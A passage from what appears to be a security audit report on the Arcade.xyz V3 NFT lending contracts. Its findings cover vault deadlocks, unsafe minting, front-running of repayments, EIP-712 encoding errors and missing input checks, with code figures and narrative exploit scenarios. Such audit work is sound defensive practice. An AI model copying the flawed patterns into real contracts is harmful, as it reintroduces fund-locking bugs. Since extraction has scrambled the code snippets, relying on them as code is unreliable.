could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the affected asset vaults from ever being withdrawn again. Asset vaults are designed to hold different types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (figure 11.1) when the asset vault is deployed through the VaultFactory contract. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vault’s address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vault’s ERC-721 token) needs to 43 Arcade.xyz V3 Security Assessment enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. 121 122 123 124 150 151 152 153 154 155 156 function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the affected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the difficulty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral: 1. Alice uses the UI to create an asset vault (vault A) and transfers five of her CryptoPunks to the asset vault. 2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the “Add Asset” option. 3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on “Add”, the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A. 44 Arcade.xyz V3 Security Assessment 4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on “Add Assets”, and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A. 5. Alice is confused and wonders if adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead. The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault. Recommendations Short term, take one of the following actions: ● Disallow the nesting of asset vaults. That is, prevent users from being able to transfer ownership of an asset vault to another asset vault. This would prevent the issue altogether. ● If allowing asset vaults to be nested is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue. Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests that ensure these edge cases are handled correctly and that users do not lose access to their assets. Other than unit tests, we recommend writing invariants and testing them using property-based testing with Echidna. 45 Arcade.xyz V3 Security Assessment +12. Risk of locked assets due to use of _mint instead of _safeMint Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-ARCADE-12 Target: contracts/vault/VaultFactory.sol, contracts/PromissoryNote.sol Description The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contract’s ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol function mint(address to, uint256 loanId) external override returns (uint256) if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert 135 { 136 PN_MintingRole(msg.sender); 137 138 139 140 return loanId; _mint(to, loanId); } Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol 46 Arcade.xyz V3 Security Assessment The _safeMint function’s built-in safety check ensures that the recipient contract has the necessary ERC721Receiver implementation, verifying the contract’s ability to receive and manage ERC-721 tokens. 258 259 260 261 262 263 264 265 266 267 268 function _safeMint( address to, uint256 tokenId, bytes memory _data ) internal virtual { _mint(to, tokenId); require( _checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer" ); } Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract, expecting a return value containing the bytes4 selector of the onERC721Received method. A successful pass of this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens. The _safeMint function does allow for reentrancy through the calling of _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the affected functions in Arcade (figures 12.1 and 12.2), this poses no risk. Exploit Scenario Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used for collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, both her asset vault token and the CryptoPunks NFT become irretrievable, stuck within her smart wallet contract due to the absence of a mechanism to handle ERC-721 tokens. Recommendations Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, thus mitigating the risk that NFTs could become frozen. Long term, enhance the unit testing suite. These tests should encompass more negative paths and potential edge cases, which will help uncover any hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a 47 Arcade.xyz V3 Security Assessment broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system. 48 Arcade.xyz V3 Security Assessment +13. Borrowers cannot realize full loan value without risking default Severity: Medium Difficulty: Low Type: Timing Finding ID: TOB-ARCADE-13 Target: contracts/LoanCore.sol Description To fully capitalize on their loans, borrowers need to retain their loaned assets and the owed interest for the entire term of their loans. However, if a borrower waits until the loan’s maturity date to repay it, they become immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrower’s collateral. 293 294 295 // First check if the call is being made after the due date. uint256 dueDate = data.startDate + data.terms.durationSecs; if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate); Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol Owing to the inherent nature of the blockchain, achieving precise synchronization between the block.timestamp and the dueDate is practically impossible. Moreover, repaying a loan before the dueDate would result in a loss of some of the loan’s inherent value because the protocol’s interest assessment design does not refund any part of the interest for early repayment. In a scenario in which block.timestamp is greater than dueDate, a lender can preempt a borrower’s loan repayment attempt, invoke the claim function, and liquidate the borrower’s collateral. Frequently, collateral will be worth more than the loaned assets, giving lenders an incentive to do this. Given the protocol’s interest assessment design, the Arcade team should implement a grace period following the maturity date where no additional interest is expected to be assessed beyond the period agreed to in the loan terms. This buffer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral. 49 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, a borrower, takes out a loan from Eve using Arcade’s NFT lending protocol. Alice deposits her rare CryptoPunk as collateral, which is more valuable than the assets loaned to her, so that her position is over-collateralized. Alice plans to hold on to the lent assets for the entire duration of the loan period in order to maximize her benefit-to-cost ratio. Eve, the lender, is monitoring the blockchain for the moment when the block.timestamp is greater than or equal to the dueDate so that she can call the claim function and liquidate Alice’s CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alice’s CryptoPunk collateral. Recommendations Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buffer would give the borrower sufficient time to repay the loan without the risk of immediate collateral liquidation. Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarification. 50 Arcade.xyz V3 Security Assessment +14. itemPredicates encoded incorrectly according to EIP-712 Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-ARCADE-14 Target: contracts/OriginationController.sol Description The itemPredicates parameter is not encoded correctly, so the signer cannot see the verifier address when signing. The verifier address receives each batch of listed assets to check them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction. According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as defined in EIP-712: hashStruct(s : 𝕊) = keccak256(typeHash ‖ encodeData(s)) where typeHash = keccak256(encodeType(typeOf(s))) In the protocol, the recoverItemsSignature function hashes an array of Predicate[] structs that are passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then included in the _ITEMS_TYPEHASH variable as a bytes32 type, referred to as itemsHash. 208 209 210 211 212 213 214 (bytes32 sighash, address externalSigner) = recoverItemsSignature( loanTerms, sig, nonce, neededSide, keccak256(abi.encode(itemPredicates)) ); Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol keccak256( bytes32 private constant _ITEMS_TYPEHASH = 85 86 87 88 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)" 89 // solhint-disable max-line-length "LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 ); 51 Arcade.xyz V3 Security Assessment Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulates the following: “The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing five members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undefined for cyclical data.” Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash. Exploit Scenario Alice creates a loan offering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alice’s loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verifier contract because that information is not included in the hash. Recommendations Short term, adjust the encoding of itemPredicates to comply with EIP-712 standards. Have the code iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH variable so that the Predicate typeHash definition is appended to it and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verifier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard. Long term, strictly adhere to established Ethereum protocols such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem. Violating these norms can lead to unforeseen security vulnerabilities. 52 Arcade.xyz V3 Security Assessment +15. The fee values can distort the incentives for the borrowers and lenders Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-15 Target: contracts/FeeController.sol Description Arcade V3 contains nine fee settings. Six of these fees are to be paid by the lender, two are to be paid by the borrower, and the remaining fee is to be paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties. For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted. In the first case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan. In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral. The various fees paid based on the outcome of the loan can result in an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, benefiting the original lenders by saving them the closing fees, and harming the borrowers by indirectly raising the interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to rollover loans. In summary, having such fine control over possible fee settings introduces hard-to-predict incentives scenarios that can scare users away or cause users who do not account for fees to inadvertently lose profits. Recommendations Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment a loan is opened, as well as the various possible outcomes, including the expected net profits if the loan is repaid, rolled over, defaulted, or redeemed. Long term, add interactive ways for users to calculate their expected profits, such as a loan simulator. 53 Arcade.xyz V3 Security Assessment +1. Dierent zero-address errors thrown by single and batch NFT withdrawal functions Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-ARCADE-1 Target: contracts/vault/AssetVault.sol Description The withdrawBatch function throws an error that is different from the single NFT withdrawal functions (withdrawERC721, withdrawERC1155). This could confuse users and other applications that interact with the Arcade contracts. The withdrawBatch function throws a custom error (AV_ZeroAddress) if the to parameter is set to the zero address. The single NFT withdrawal functions withdrawERC721 and withdrawERC1155 do not explicitly check the to parameter. All three of these functions internally call the _withdrawERC721 and _withdrawERC1155 functions, which also do not explicitly check the to parameter. The lack of such a check is not a problem: according to the ERC-721 and ERC-1155 standards, a transfer must revert if to is the zero address, so the single NFT withdrawal functions will revert on this condition. However, they will revert with the error message that is defined inside the actual NFT contract instead of the Arcade AV_ZeroAddress error, which is thrown when withdrawBatch reverts. ) external override onlyOwner onlyWithdrawEnabled { uint256 tokensLength = tokens.length; if (tokensLength > MAX_WITHDRAW_ITEMS) revert address[] calldata tokens, uint256[] calldata tokenIds, TokenType[] calldata tokenTypes, address to function withdrawBatch( 193 194 195 196 197 198 199 200 AV_TooManyItems(tokensLength); 201 202 AV_LengthMismatch("tokenType"); 203 204 205 206 if (to == address(0)) revert AV_ZeroAddress(); for (uint256 i = 0; i < tokensLength; i++) { if (tokens[i] == address(0)) revert AV_ZeroAddress(); if (tokensLength != tokenIds.length) revert AV_LengthMismatch("tokenId"); if (tokensLength != tokenTypes.length) revert 22 Arcade.xyz V3 Security Assessment Figure 1.1: A snippet of the withdrawBatch function in arcade-protocol/contracts/vault/AssetVault.sol Additionally, the CryptoPunks NFT contract does not follow the ERC-721 and ERC-1155 standards and contains no check that prevents funds from being transferred to the zero address (and the function is called transferPunk instead of the standard transfer). An explicit check to ensure that to is not the zero address inside the withdrawPunk function is therefore recommended. 114 115 116 117 118 119 120 121 122 123 124 125 126 it. 127 128 129 130 131 132 133 134 function transferPunk(address to, uint punkIndex) { if (!allPunksAssigned) throw; if (punkIndexToAddress[punkIndex] != msg.sender) throw; if (punkIndex >= 10000) throw; if (punksOfferedForSale[punkIndex].isForSale) { punkNoLongerForSale(punkIndex); } punkIndexToAddress[punkIndex] = to; balanceOf[msg.sender]--; balanceOf[to]++; Transfer(msg.sender, to, 1); PunkTransfer(msg.sender, to, punkIndex); // Check for the case where there is a bid from the new owner and refund // Any other bid can stay in place. Bid bid = punkBids[punkIndex]; if (bid.bidder == to) { // Kill bid and refund value pendingWithdrawals[to] += bid.value; punkBids[punkIndex] = Bid(false, punkIndex, 0x0, 0); } } Figure 1.2: The transferPunk function in CryptoPunksMarket contract (Etherscan) Lastly, there is no string argument to the AV_ZeroAddress error to indicate which variable equaled the zero address and caused the revert, unlike the AV_LengthMismatch error. For example, in the batch function (figure 1.1), the AV_ZeroAddress could be thrown in line 203 or 206. Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that interacts with an AssetVault contract. In his implementation, he catches specific errors that are thrown so that he can show an informative message to the user. Because the batch and withdrawal functions throw different errors when to is the zero address, he needs to write two versions of error handlers instead of just one. 23 Arcade.xyz V3 Security Assessment Recommendations Short term, add the zero address check with the custom error to the _withdrawERC721 and _withdrawERC1155 functions. This will cause the same custom error to be thrown for all of the single and batch NFT withdrawal functions. Also, add an explicit zero-address check inside the withdrawPunk function. Lastly, add a string argument to the AV_ZeroAddress custom error that is used to indicate the name of the variable that triggered the error (similar to the one in AV_LengthMismatch). Long term, ensure consistency in the errors thrown throughout the implementation. This will allow users and developers to understand errors that are thrown and will allow the Arcade team to test fewer errors. 24 Arcade.xyz V3 Security Assessment +2. Solidity compiler optimizations can be problematic Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-2 Target: hardhat.config.ts Description Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe. 147 148 149 150 optimizer: { enabled: optimizerEnabled, runs: 200, }, Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js—causes a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 25 Arcade.xyz V3 Security Assessment +3. callApprove does not follow approval best practices Severity: Informational Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-ARCADE-3 Target: contracts/vault/AssetVault.sol Description The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocol’s integration with third-party contracts or off-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeIncreaseAllowance( function safeDecreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, "SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: ● Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. ● Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment +4. Risk of confusing events due to missing checks in whitelist contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-4 Target: contracts/vault/CallWhitelist.sol, contracts/vault/CallWhitelistDelegation.sol Description The CallWhitelist contract’s add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. Such an event could confuse off-chain monitoring systems, or at least make it more difficult to retrace what happened by looking at the emitted event. 64 65 66 67 function add(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = true; emit CallAdded(msg.sender, callee, selector); } Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol 75 76 77 78 function remove(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = false; emit CallRemoved(msg.sender, callee, selector); } Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed. 85 86 87 88 89 function setRegistry(address _registry) external onlyOwner { registry = IDelegationRegistry(_registry); emit RegistryChanged(msg.sender, _registry); } 29 Arcade.xyz V3 Security Assessment Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the “removed” call was never in the whitelist in the first place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time. Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful. Additionally, consider setting up an off-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur. 30 Arcade.xyz V3 Security Assessment +5. Missing checks of _exists() return value Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-5 Target: contracts/PromissoryNote.sol, contracts/vault/VaultFactory.sol Description The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specified tokenId exists. In two instances in Arcade’s codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists(). 165 function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) { 166 167 168 169 } _exists(tokenId); return descriptor.tokenURI(address(this), tokenId); Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol 48 function tokenURI(address, uint256 tokenId) external view override returns (string memory) { 49 return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; 50 } Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. 31 Arcade.xyz V3 Security Assessment Recommendations Short term, add a check for the _exists() function’s return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments. 32 Arcade.xyz V3 Security Assessment +6. Incorrect deployers in integration tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-ARCADE-6 Target: test/Integration.ts Description The fixture deployment function in the provided integration tests uses different signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the fixture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in figure 6.1; however, there are other instances in which contracts are not deployed from the admin account. const whitelist = await deploy("CallWhitelist", signers[0], const signers: SignerWithAddress[] = await ethers.getSigners(); const [borrower, lender, admin] = signers; 71 72 73 74 []); 75 76 77 signers[0], [BASE_URI]) 78 [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]); const vaultTemplate = await deploy("AssetVault", signers[0], []); const feeController = await deploy("FeeController", admin, []); const descriptor = await deploy("BaseURIDescriptor", const vaultFactory = await deploy("VaultFactory", signers[0], Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests file. 33 Arcade.xyz V3 Security Assessment Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct. 34 Arcade.xyz V3 Security Assessment +7. Risk of out-of-gas revert due to use of transfer() in claimFees Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-7 Target: contracts/vault/VaultFactory.sol Description The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation sends only 2,300 units of gas with this operation. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer(). function withdrawETH(address to) external override onlyOwner 223 onlyWithdrawEnabled nonReentrant { 224 225 226 227 228 // perform transfer uint256 balance = address(this).balance; payable(to).sendValue(balance); emit WithdrawETH(msg.sender, to, balance); } 35 Arcade.xyz V3 Security Assessment Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks. Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks. Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the passed along 2,300 units of gas. Recommendations Short term, consider replacing the claimFees function’s use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benefit of being able to one day add logic in the fee recipient’s receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sufficient for those recipients. 36 Arcade.xyz V3 Security Assessment +8. Risk of lost funds due to lack of zero-address check in functions Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-8 Target: contracts/vault/VaultFactory.sol, contracts/RepaymentController.sol, contracts/LoanCore.sol Description The VaultFactory.claimFees (figure 8.1), RepaymentController.redeemNote (figure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 8.1: The claimFees function in 